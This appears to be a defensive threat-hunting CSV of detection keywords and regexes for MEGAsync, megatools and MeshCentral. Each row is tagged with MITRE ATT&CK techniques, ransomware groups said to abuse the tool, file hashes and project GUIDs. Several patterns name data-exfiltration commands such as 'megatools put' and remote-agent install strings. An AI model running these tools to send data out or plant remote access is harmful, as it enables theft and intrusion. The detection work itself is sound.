"*megasync-Raspbian_*_armhf.deb*",".{0,1000}megasync\-Raspbian_.{0,1000}_armhf\.deb.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*MEGAsyncSetup32_*_RC3.exe*",".{0,1000}MEGAsyncSetup32_.{0,1000}_RC3\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*MEGASYNCSETUP64.EXE-*.pf*",".{0,1000}MEGASYNCSETUP64\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*MEGAsyncSetup64_*_RC3.exe*",".{0,1000}MEGAsyncSetup64_.{0,1000}_RC3\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*MEGAsyncSetupArm64.dmg*",".{0,1000}MEGAsyncSetupArm64\.dmg.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*megasync-x86_64.pkg*",".{0,1000}megasync\-x86_64\.pkg.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*megasync-xUbuntu_*_amd64.deb*",".{0,1000}megasync\-xUbuntu_.{0,1000}_amd64\.deb.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'Product'>MEGAsync</Data>*",".{0,1000}\'Product\'\>MEGAsync\<\/Data\>.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ReferrerUrl=https://mega.io/*",".{0,1000}ReferrerUrl\=https\:\/\/mega\.io\/.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'Signature'>Mega Limited</Data>*",".{0,1000}\'Signature\'\>Mega\sLimited\<\/Data\>.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Windows\System32\Tasks\MEGA*",".{0,1000}Windows\\System32\\Tasks\\MEGA.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/megatools.exe*",".{0,1000}\/megatools\.exe.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\.megatools.cache*",".{0,1000}\\\.megatools\.cache.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","",""
"*\megatools-*-win64\*",".{0,1000}\\megatools\-.{0,1000}\-win64\\.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","",""
"*\megatools.exe*",".{0,1000}\\megatools\.exe.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","",""
"*\Users\*\AppData\Local\Temp\*.megatools.cache*",".{0,1000}\\Users\\.{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\.megatools\.cache.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","",""
"*megatools copy -l * -r *",".{0,1000}megatools\scopy\s\-l\s.{0,1000}\s\-r\s.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","",""
"*megatools put *",".{0,1000}megatools\sput\s.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","",""
"* install meshcentral*",".{0,1000}\sinstall\smeshcentral.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"* meshcentral.service*",".{0,1000}\smeshcentral\.service.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"* -omeshcmd.exe -imodule1.js*",".{0,1000}\s\-omeshcmd\.exe\s\-imodule1\.js.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*.meshagent.pid*",".{0,1000}\.meshagent\.pid.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*/bin/meshagent*",".{0,1000}\/bin\/meshagent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*/bin/MeshCommander*",".{0,1000}\/bin\/MeshCommander.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*/MeshAgent --*",".{0,1000}\/MeshAgent\s\-\-.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*/MeshAgent.git*",".{0,1000}\/MeshAgent\.git.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","1","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*/MeshCentral.git*",".{0,1000}\/MeshCentral\.git.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*/meshcentral.service*",".{0,1000}\/meshcentral\.service.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*/meshinstall.sh*",".{0,1000}\/meshinstall\.sh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*/meshinstall-bsd-rcd.sh*",".{0,1000}\/meshinstall\-bsd\-rcd\.sh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*/system/meshagent*",".{0,1000}\/system\/meshagent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*/system/MeshCommander*",".{0,1000}\/system\/MeshCommander.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\\MeshAgent*",".{0,1000}\\\\MeshAgent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\CurrentControlSet\Services\Mesh*",".{0,1000}\\CurrentControlSet\\Services\\Mesh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*\meshagent.db*",".{0,1000}\\meshagent\.db.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*\MeshAgent.sln*",".{0,1000}\\MeshAgent\.sln.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*\MeshAgentKvm.log*",".{0,1000}\\MeshAgentKvm\.log.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*\MeshAgent-master*",".{0,1000}\\MeshAgent\-master.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*\meshcentral.db*",".{0,1000}\\meshcentral\.db.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\meshcentral.js*",".{0,1000}\\meshcentral\.js.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\MeshCentral.sln*",".{0,1000}\\MeshCentral\.sln.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\MeshCentral\*",".{0,1000}\\MeshCentral\\.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\MeshCmd.exe*",".{0,1000}\\MeshCmd\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\meshcmd.js*",".{0,1000}\\meshcmd\.js.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\meshcommander.dmp*",".{0,1000}\\meshcommander\.dmp.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\MeshMessenger.exe*",".{0,1000}\\MeshMessenger\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*\MeshService.rc*",".{0,1000}\\MeshService\.rc.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*\node_modules\meshcentral*",".{0,1000}\\node_modules\\meshcentral.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\Open Source\MeshCentral\*",".{0,1000}\\Open\sSource\\MeshCentral\\.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\Safeboot\Network\AltMeshAgent*",".{0,1000}\\Safeboot\\Network\\AltMeshAgent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*\Uninstall\MeshCentralAgent*",".{0,1000}\\Uninstall\\MeshCentralAgent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*>Mesh Agent background service<*",".{0,1000}\>Mesh\sAgent\sbackground\sservice\<.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*>Mesh Agent Company<*",".{0,1000}\>Mesh\sAgent\sCompany\<.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*>meshagentRepair<*",".{0,1000}\>meshagentRepair\<.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*>MeshCentral Agent<*",".{0,1000}\>MeshCentral\sAgent\<.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*>MeshCentral<*",".{0,1000}\>MeshCentral\<.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*035cf1744ffefef60ff711aeae4bcf39cd902e0a581b443553545f6b934f2a71*",".{0,1000}035cf1744ffefef60ff711aeae4bcf39cd902e0a581b443553545f6b934f2a71.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*03A09084-0576-45C5-97CA-B83B1A8688B8*",".{0,1000}03A09084\-0576\-45C5\-97CA\-B83B1A8688B8.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*127ec181a70d665e539d93b8e4a014ce099faf64f0eb790a85158cd5a1349bfd*",".{0,1000}127ec181a70d665e539d93b8e4a014ce099faf64f0eb790a85158cd5a1349bfd.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*128C450F-C8B3-403A-9D0C-E5AD6B7F566F*",".{0,1000}128C450F\-C8B3\-403A\-9D0C\-E5AD6B7F566F.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*169fa5bf73c73e2785691de174d40209dfa479430539acbce08eaf24a4cbb0c0*",".{0,1000}169fa5bf73c73e2785691de174d40209dfa479430539acbce08eaf24a4cbb0c0.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*1e5aad914ec6f6fdbb0c0c340ab0e2c336922fba3e556b007d8d5002a6c478ca*",".{0,1000}1e5aad914ec6f6fdbb0c0c340ab0e2c336922fba3e556b007d8d5002a6c478ca.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*1f2cf255b1a6d9fafad11a2d27bc9471f1e883c59a02504794e2846c7f955976*",".{0,1000}1f2cf255b1a6d9fafad11a2d27bc9471f1e883c59a02504794e2846c7f955976.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*2523d17e9fc1b815001f2e7ea951dd3454a78bab0b12cea6a82294b9d93cd95c*",".{0,1000}2523d17e9fc1b815001f2e7ea951dd3454a78bab0b12cea6a82294b9d93cd95c.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*2ca71789c452d549809f184185b08febc560b5dc81030586a3920a95ea7a3d12*",".{0,1000}2ca71789c452d549809f184185b08febc560b5dc81030586a3920a95ea7a3d12.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*3887f7179aa36da3d9fc527a714d6f4be500dd25beede1e161e9f019beaf7636*",".{0,1000}3887f7179aa36da3d9fc527a714d6f4be500dd25beede1e161e9f019beaf7636.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*3b2cec2cc3a2e3185fc1797590dc58421cf4382e86d83e8658990bb3979d7209*",".{0,1000}3b2cec2cc3a2e3185fc1797590dc58421cf4382e86d83e8658990bb3979d7209.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
